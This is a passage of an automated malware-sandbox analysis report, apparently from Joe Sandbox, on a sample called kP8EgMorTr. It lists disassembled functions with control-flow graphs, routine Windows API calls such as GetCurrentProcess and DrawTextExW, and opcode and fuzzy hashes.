2225->2227 2226->2227 2238 6d01531-6d01533 2227->2238 2239 6d0153a-6d01541 2227->2239 2232 6d012e6-6d012e8 2228->2232 2229->2228 2240 6d012b2-6d012b9 2229->2240 2230->2225 2232->2218 2234 6d012ee-6d01365 2232->2234 2234->2218 2244 6d0136b-6d01471 call 6d00154 2234->2244 2238->2239 2242 6d012c2-6d012c9 2240->2242 2243 6d012bb-6d012c0 2240->2243 2246 6d012cb-6d012cd 2242->2246 2247 6d012cf-6d012df 2242->2247 2245 6d012e2 2243->2245 2244->2218 2245->2232 2246->2245 2247->2245
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq
                                                                                            • API String ID: 0-3820536768
                                                                                            • Opcode ID: b6bb5d40d8fb5046111123318cebe1969f1a75809976b0eb7aadfcd490adf1fc
                                                                                            • Instruction ID: 13d4b7e1b525b11c59b9a1664587af5a91c1e123c72084eb687016211aee73fd
                                                                                            • Opcode Fuzzy Hash: b6bb5d40d8fb5046111123318cebe1969f1a75809976b0eb7aadfcd490adf1fc
                                                                                            • Instruction Fuzzy Hash: A242FA71E0061A8FDB54DF68C884BEDF7B1FF89300F1486AAD459A7251EB70A985CF90
                                                                                            Function 009F7093 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Ppq
                                                                                            • API String ID: 0-1927884935
                                                                                            • Opcode ID: 91f8c794794ba0eb6037eaa4b3022caa7c3fa6e5ab139c549fb19678dc6d8163
                                                                                            • Instruction ID: dbc9965511bfdd42d67ec26006e0d3a1a522a7c73ea26bb91c441387aec83c91
                                                                                            • Opcode Fuzzy Hash: 91f8c794794ba0eb6037eaa4b3022caa7c3fa6e5ab139c549fb19678dc6d8163
                                                                                            • Instruction Fuzzy Hash: 0581B074E012089FDB15DFA9D884AEDBBF2FF88300F24852AE519AB355DB346946CF40
                                                                                            Function 009F5CC4 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Ppq
                                                                                            • API String ID: 0-1927884935
                                                                                            • Opcode ID: 18c1d8d0d966451241d4ca82c4c99f4f2f5958eea3ab2775b562f832d239683a
                                                                                            • Instruction ID: fc2af5044272ffd8fc71b1bf34dcfc8856c0daa72c3656d1fc2b9cb53cf504dd
                                                                                            • Opcode Fuzzy Hash: 18c1d8d0d966451241d4ca82c4c99f4f2f5958eea3ab2775b562f832d239683a
                                                                                            • Instruction Fuzzy Hash: F681A274E002089FDB14DFA9D984AEDBBF2FF88300F24852AE519AB355DB346946CF50
                                                                                            Function 06D051FC Relevance: .6, Instructions: 621COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07e962e372034c90b8311a2e68ada87d4ebaeb94cc324b36b10f4c02993e09f3
                                                                                            • Instruction ID: b080b645961bfcf77e759fae24f379315a1e49ea0d1dda88de399f4f68ce21a6
                                                                                            • Opcode Fuzzy Hash: 07e962e372034c90b8311a2e68ada87d4ebaeb94cc324b36b10f4c02993e09f3
                                                                                            • Instruction Fuzzy Hash: D2323F70E002189FEB64DFB9D8507AEB7F2FF84300F14856AD509AB395DA34AD45CB91
                                                                                            Function 04BFF00F Relevance: .6, Instructions: 597COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 729d10dbd8a5f363daf19ed9041534fc1f2bea123d869347f01b31df0ea1477a
                                                                                            • Instruction ID: 4f2e288b9aa17c3fdf4a5f5092c42226e7e23bc2a7f0b7bec68fe5ca1955ed27
                                                                                            • Opcode Fuzzy Hash: 729d10dbd8a5f363daf19ed9041534fc1f2bea123d869347f01b31df0ea1477a
                                                                                            • Instruction Fuzzy Hash: 74526D34A007458FDB14DF28C844B99B7B2FF89314F2582E9D5586F3A2DB71A986CF81
                                                                                            Function 04BF8664 Relevance: .6, Instructions: 592COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf202b0da8ed9723126b87efd057d10958f7c0fce0866a8efd90e4a70af61148
                                                                                            • Instruction ID: 6fbf656a9ef966db9da80585d7c6f210d1742d7ff7a36454dece97a4d2e544a2
                                                                                            • Opcode Fuzzy Hash: bf202b0da8ed9723126b87efd057d10958f7c0fce0866a8efd90e4a70af61148
                                                                                            • Instruction Fuzzy Hash: 5E524D34A007058FDB14DF28C844B99B7B2FF89314F2586E9D5586F3A2DB71A986CF41
                                                                                            Function 04BFF100 Relevance: .6, Instructions: 576COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3ada8e4d2c7fafd374a75178d7cd4275c5beb76ee56cc60547f34ccec105f62c
                                                                                            • Instruction ID: 0a6eee03785e7fcffdc7f5c3cb6764f3f40b5db9514b785c0851926428dca587
                                                                                            • Opcode Fuzzy Hash: 3ada8e4d2c7fafd374a75178d7cd4275c5beb76ee56cc60547f34ccec105f62c
                                                                                            • Instruction Fuzzy Hash: C2526E34A007058FDB14DF28C844B99B7B2FF89314F2586E9D5586F3A2DB71A986CF41
                                                                                            Function 06D051F5 Relevance: .3, Instructions: 309COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 603352d4b1afd64ba788f6788d547563513269940dce0386b44aa243e4a0ce22
                                                                                            • Instruction ID: 1cd0768aaa3ec829b88e6d420993a511c92bba9bcf106f2367cf6c74785016ef
                                                                                            • Opcode Fuzzy Hash: 603352d4b1afd64ba788f6788d547563513269940dce0386b44aa243e4a0ce22
                                                                                            • Instruction Fuzzy Hash: 9AC14C30D002589FEBA5DFA9D88079DBBB1EF89300F14C1A9D859AF295D770E985CF90
                                                                                            Function 06D06EE8 Relevance: .3, Instructions: 280COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4721c4971a2b615baee2f35b47c1a8982f3c97ab5bd75fad7884156eddc6d8be
                                                                                            • Instruction ID: 9229ad36fca0affd5ecd665f2af4b19f554297fa22790e2ebb44bc82de7a1dd0
                                                                                            • Opcode Fuzzy Hash: 4721c4971a2b615baee2f35b47c1a8982f3c97ab5bd75fad7884156eddc6d8be
                                                                                            • Instruction Fuzzy Hash: 70C13C30D002189FEF65DFA5D88079DBBB2EF88300F14C1A9D859AB295D770E985CF90
                                                                                            Function 06D0E760 Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c68ed3dd928c2400be3146e84543fc4f68618989d300b033c1ecd5450edcbf80
                                                                                            • Instruction ID: 65b1af655aa109ed04e1580d616bf2de6199687479d8b8531e033d08b0b69ea3
                                                                                            • Opcode Fuzzy Hash: c68ed3dd928c2400be3146e84543fc4f68618989d300b033c1ecd5450edcbf80
                                                                                            • Instruction Fuzzy Hash: 2921B5B1D046188BEB68CFABD94079EFBF6BFC8300F14C46AC458A7255EB7459468F90
                                                                                            Function 06D0E770 Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f89167f1b7127134182fd34663d3fa488473f85982819b528b9a5aa1b205aede
                                                                                            • Instruction ID: 8c2b8f58aca9766f13c5be3cb95cb9031c61a2e13767c5bb814701002a6e2b12
                                                                                            • Opcode Fuzzy Hash: f89167f1b7127134182fd34663d3fa488473f85982819b528b9a5aa1b205aede
                                                                                            • Instruction Fuzzy Hash: 8921D8B1D046188BEB68CFABD94079EFBF6BFC8300F14C06AC418A7255EB7449468F90
                                                                                            Function 009FD570 Relevance: 6.1, APIs: 4, Instructions: 137threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 294 9fd570-9fd60f GetCurrentProcess 299 9fd618-9fd64c GetCurrentThread 294->299 300 9fd611-9fd617 294->300 301 9fd64e-9fd654 299->301 302 9fd655-9fd689 GetCurrentProcess 299->302 300->299 301->302 304 9fd68b-9fd691 302->304 305 9fd692-9fd6ad call 9fd753 302->305 304->305 308 9fd6b3-9fd6e2 GetCurrentThreadId 305->308 309 9fd6eb-9fd74d 308->309 310 9fd6e4-9fd6ea 308->310 310->309
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 009FD5FE
                                                                                            • GetCurrentThread.KERNEL32 ref: 009FD63B
                                                                                            • GetCurrentProcess.KERNEL32 ref: 009FD678
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009FD6D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: f2fcc127aba743f6fb1cbfd3c14e93a810177349926c976e27aba949f01e0c41
                                                                                            • Instruction ID: 53ea91d522e3c075b2d68fadbf6cc75782dafac60c543c5133a13b2dbbb630cf
                                                                                            • Opcode Fuzzy Hash: f2fcc127aba743f6fb1cbfd3c14e93a810177349926c976e27aba949f01e0c41
                                                                                            • Instruction Fuzzy Hash: 665177B0D01349DFEB14CFAAD548BAEBBF1EF88304F248459E108AB351D7746845CB66
                                                                                            Function 009FD580 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 317 9fd580-9fd60f GetCurrentProcess 321 9fd618-9fd64c GetCurrentThread 317->321 322 9fd611-9fd617 317->322 323 9fd64e-9fd654 321->323 324 9fd655-9fd689 GetCurrentProcess 321->324 322->321 323->324 326 9fd68b-9fd691 324->326 327 9fd692-9fd6ad call 9fd753 324->327 326->327 330 9fd6b3-9fd6e2 GetCurrentThreadId 327->330 331 9fd6eb-9fd74d 330->331 332 9fd6e4-9fd6ea 330->332 332->331
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 009FD5FE
                                                                                            • GetCurrentThread.KERNEL32 ref: 009FD63B
                                                                                            • GetCurrentProcess.KERNEL32 ref: 009FD678
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009FD6D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 28b3582edda7f3c0f014efc15eecf255b7202a1a6fa8cce88cd540b65af52cb4
                                                                                            • Instruction ID: 79551d16efb2fbd1ec81512603655f68ef0dbbd57695bcbdb4ffdba5d1d111c4
                                                                                            • Opcode Fuzzy Hash: 28b3582edda7f3c0f014efc15eecf255b7202a1a6fa8cce88cd540b65af52cb4
                                                                                            • Instruction Fuzzy Hash: 9B5155B0D01709CFEB24DFAAD648BAEBBF1EB88304F208459E109AB350D7745944CB66
                                                                                            Function 009FB2DF Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2381 9fb2df-9fb2ff 2382 9fb32b-9fb32f 2381->2382 2383 9fb301-9fb30e call 9faca4 2381->2383 2384 9fb343-9fb384 2382->2384 2385 9fb331-9fb33b 2382->2385 2388 9fb324 2383->2388 2389 9fb310 2383->2389 2392 9fb386-9fb38e 2384->2392 2393 9fb391-9fb39f 2384->2393 2385->2384 2388->2382 2436 9fb316 call 9fb579 2389->2436 2437 9fb316 call 9fb588 2389->2437 2392->2393 2395 9fb3c3-9fb3c5 2393->2395 2396 9fb3a1-9fb3a6 2393->2396 2394 9fb31c-9fb31e 2394->2388 2399 9fb460-9fb520 2394->2399 2400 9fb3c8-9fb3cf 2395->2400 2397 9fb3a8-9fb3af call 9facb0 2396->2397 2398 9fb3b1 2396->2398 2402 9fb3b3-9fb3c1 2397->2402 2398->2402 2431 9fb528-9fb553 GetModuleHandleW 2399->2431 2432 9fb522-9fb525 2399->2432 2403 9fb3dc-9fb3e3 2400->2403 2404 9fb3d1-9fb3d9 2400->2404 2402->2400 2406 9fb3e5-9fb3ed 2403->2406 2407 9fb3f0-9fb3f2 call 9facc0 2403->2407 2404->2403 2406->2407 2410 9fb3f7-9fb3f9 2407->2410 2412 9fb3fb-9fb403 2410->2412 2413 9fb406-9fb40b 2410->2413 2412->2413 2415 9fb40d-9fb414 2413->2415 2416 9fb429-9fb436 2413->2416 2415->2416 2417 9fb416-9fb426 call 9facd0 call 9face0 2415->2417 2422 9fb459-9fb45f 2416->2422 2423 9fb438-9fb456 2416->2423 2417->2416 2423->2422 2433 9fb55c-9fb570 2431->2433 2434 9fb555-9fb55b 2431->2434 2432->2431 2434->2433 2436->2394 2437->2394
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 009FB546
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: ebe686152f3eb003c81d25012c603972acffff8ecfe016a11571a7faca6a07ad
                                                                                            • Instruction ID: fef87e47286737419ab3504a93e8c1318b077b384c0392c6ca79d38cae0334b8
                                                                                            • Opcode Fuzzy Hash: ebe686152f3eb003c81d25012c603972acffff8ecfe016a11571a7faca6a07ad
                                                                                            • Instruction Fuzzy Hash: 4F818870A00B098FD724CF69D5517AABBF5FF88300F00892EE58AC7A51D774E806CB91
                                                                                            Function 009F590D Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2438 9f590d-9f59d9 CreateActCtxA 2440 9f59db-9f59e1 2438->2440 2441 9f59e2-9f5a3c 2438->2441 2440->2441 2448 9f5a3e-9f5a41 2441->2448 2449 9f5a4b-9f5a4f 2441->2449 2448->2449 2450 9f5a51-9f5a5d 2449->2450 2451 9f5a60 2449->2451 2450->2451 2453 9f5a61 2451->2453 2453->2453
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 009F59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 34ce465e170d1483eb2bf4e8d3cddc6476738f637f4ac4b399885b18bc11c15b
                                                                                            • Instruction ID: c5b4ffa92b4d4a7d94f5b14fa6154f0c8450ff159a60d0dfd476bb6b0bb7bd4d
                                                                                            • Opcode Fuzzy Hash: 34ce465e170d1483eb2bf4e8d3cddc6476738f637f4ac4b399885b18bc11c15b
                                                                                            • Instruction Fuzzy Hash: 0841EF71C0071DCFEB24DFA9C884B9DBBB6BF49304F24816AD508AB251DB756946CF90
                                                                                            Function 009F44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 009F59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 0ee029a88fb394bd561fe32f92dfeb4b6a65d432913af6679ce919d9fcf4620a
                                                                                            • Instruction ID: 24870b03d8de0c27a2e8b402e735b84e518039171e58733b07c1d93426ec488b
                                                                                            • Opcode Fuzzy Hash: 0ee029a88fb394bd561fe32f92dfeb4b6a65d432913af6679ce919d9fcf4620a
                                                                                            • Instruction Fuzzy Hash: 9941D070C0071DCBEB24DFA9C884B9EBBB5BF49304F20816AD508AB251DB756946CF90
                                                                                            Function 06D07820 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFromIconResource
                                                                                            • String ID:
                                                                                            • API String ID: 3668623891-0
                                                                                            • Opcode ID: 7fc4554f12635669bd1e0ed0423dcc4c99987fbeeeb975e81f4030ce10ac66af
                                                                                            • Instruction ID: ff7e8560d3de83a5834359babb2e8b4721edb7e01dfc7fa4f25ede908c5a0e3b
                                                                                            • Opcode Fuzzy Hash: 7fc4554f12635669bd1e0ed0423dcc4c99987fbeeeb975e81f4030ce10ac66af
                                                                                            • Instruction Fuzzy Hash: C9317872900389DFDB11DFA9C944BEABFF4EF09310F14845AE954AB261C33A9854DFA1
                                                                                            Function 06D05B08 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06D05AF5,?,?), ref: 06D05BA7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: 9942cee9babd3b759f1ab506ee2f5484292678d2ddf1ededd52d966247431f34
                                                                                            • Instruction ID: 8eeb29adc3e8c7964ba1f03e6bb2e7e40155e7c6a37ce085edb39e003dfa1582
                                                                                            • Opcode Fuzzy Hash: 9942cee9babd3b759f1ab506ee2f5484292678d2ddf1ededd52d966247431f34
                                                                                            • Instruction Fuzzy Hash: B631E5B5D012499FDB10CF9AE980ADEFBF4FB48310F14842AE918A7350D775A544CFA0
                                                                                            Function 06D050DC Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06D05AF5,?,?), ref: 06D05BA7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: 1c499d55c88151e7edf9b1d9a628dacbd7d9d7a3c861a0e7b85c60271161fbcd
                                                                                            • Instruction ID: c9c785c3c69733b1276769c394e90bf510517c9ea1a3365a9bc94ddb03a1d64c
                                                                                            • Opcode Fuzzy Hash: 1c499d55c88151e7edf9b1d9a628dacbd7d9d7a3c861a0e7b85c60271161fbcd
                                                                                            • Instruction Fuzzy Hash: 9431E2B5D00249AFEB10CF9AD984BDEBBF4FB48210F14842AE819A7350D775A940CFA4
                                                                                            Function 009FD7C0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FD84F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 0415e90211772eae59a6d4edd6d184500ce3e50ea3913a68af9a89406f204918
                                                                                            • Instruction ID: ca31c2cc04b8b682519c8bcf4dffb3400077286d833deef9cff3b6b7eb874769
                                                                                            • Opcode Fuzzy Hash: 0415e90211772eae59a6d4edd6d184500ce3e50ea3913a68af9a89406f204918
                                                                                            • Instruction Fuzzy Hash: F321F4B5C01248AFDB10CFAAD584AEEBFF5EB48310F14841AE954A7310D375A945CF60
                                                                                            Function 04BF4E50 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 04BF4ECF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: FromMonitorPoint
                                                                                            • String ID:
                                                                                            • API String ID: 1566494148-0
                                                                                            • Opcode ID: 9bcdc6c7190ee9daa1ea162c8bb89ec2c68b9cec00604548420e2433b8d2bc4d
                                                                                            • Instruction ID: d6f314bd84e1aef7a6b9dd00415bfa9ddb7fb793bf2015c1ddd0ed8dd087ba22
                                                                                            • Opcode Fuzzy Hash: 9bcdc6c7190ee9daa1ea162c8bb89ec2c68b9cec00604548420e2433b8d2bc4d
                                                                                            • Instruction Fuzzy Hash: 69215E75D002489FDB20DF99D405BAEBBF5FB58310F108419E959B7340D735AA48CFA1
                                                                                            Function 009FD7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FD84F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 5956a024b452dbb399c1b5e6c0c867322aab6ec156a16ccd74f756d25c002f1d
                                                                                            • Instruction ID: e9670bdf66149e781e9972d92429453e171d7689bb68f00b11108f80dcd94839
                                                                                            • Opcode Fuzzy Hash: 5956a024b452dbb399c1b5e6c0c867322aab6ec156a16ccd74f756d25c002f1d
                                                                                            • Instruction Fuzzy Hash: 8321E4B5D01248EFDB10CF9AD584ADEBBF9FB48320F14841AE918A7350D379A940CF65
                                                                                            Function 04BF4E41 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 04BF4ECF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: FromMonitorPoint
                                                                                            • String ID:
                                                                                            • API String ID: 1566494148-0
                                                                                            • Opcode ID: 5f410fb1a001761df1f7a9b32abd3db6804833cc16276be9b23e4cf3bfe22658
                                                                                            • Instruction ID: 37a0d95a28699812b449a5b029d4f44a3b33309d6d9c3237af112be98c2acef5
                                                                                            • Opcode Fuzzy Hash: 5f410fb1a001761df1f7a9b32abd3db6804833cc16276be9b23e4cf3bfe22658
                                                                                            • Instruction Fuzzy Hash: 9C216DB5D003489FDB11DF99D504BAEBBB0FB48310F108459E959B7380D734AA44CFA1
                                                                                            Function 06D05244 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06D0783A,?,?,?,?,?), ref: 06D078DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFromIconResource
                                                                                            • String ID:
                                                                                            • API String ID: 3668623891-0
